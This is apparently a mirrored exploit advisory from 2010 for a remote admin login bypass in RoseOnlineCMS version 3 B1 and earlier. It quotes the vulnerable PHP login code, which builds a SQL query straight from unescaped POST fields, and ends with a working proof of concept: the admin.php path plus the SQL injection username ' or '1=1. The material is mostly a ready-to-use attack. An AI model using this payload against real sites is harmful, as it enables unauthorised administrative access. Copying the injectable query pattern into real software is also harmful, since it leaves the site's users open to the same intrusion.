扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 |
\#'#/ (-.-) --------------------oOO---(_)---OOo------------------- |RoseOnlineCMS <= 3 B1 Remote Login Bypass Exploit | |(works only with magic_quotes_gpc = off)| ------------------------------------------------------ [!] Discovered: cr4wl3r <cr4wl3r[!]linuxmail.org> [!] Download: http://sourceforge.net/projects/rosecms/files/ [!] Date: 16.01.2010 [!] Remote: yes [!] Code : <form action="<?php $PHP_SELF; ?>" method="post"> <div align="center"> <table width="295" border="0"> <tr> <td width="64">Username:</td> <td width="215"> <label> <input name="user" type="text" id="user"> </label></td> </tr> <tr> <td>Password:</td> <td><input name="pass" type="text" id="pass"></td> </tr> </table> </div> <p align="center"> <em> <input name="submit" type="submit" id="submit" value="Login"> </em> </form> </p> <?php if(isset($_POST['submit'])) { // username and password sent from signup form $USER = $_POST['user']; $PASS = md5($_POST['pass']); $sql = "SELECT * FROM <code>accounts</code> WHERE username='$USER' and password='$PASS' and accesslevel = '300'"; $result = mysql_query($sql); // Mysql_num_row is counting table row $count = mysql_num_rows($result); // If result matched $myusername and $mypassword, table row must be 1 row if($count == 1){ // Register $user, $pass and redirect to file ?op=admin session_register("USER"); session_register("PASS"); echo('Logged in: <a href=?op=admincp>Click here</a> to go to the control panel.'); } else { echo "You are banned, or you are an user with no permission to enter."; } } ?> [!] PoC: [RoseOnlineCMS_path]/modules/admin.php username : ' or '1=1 password : cr4wl3r |
体验盒子
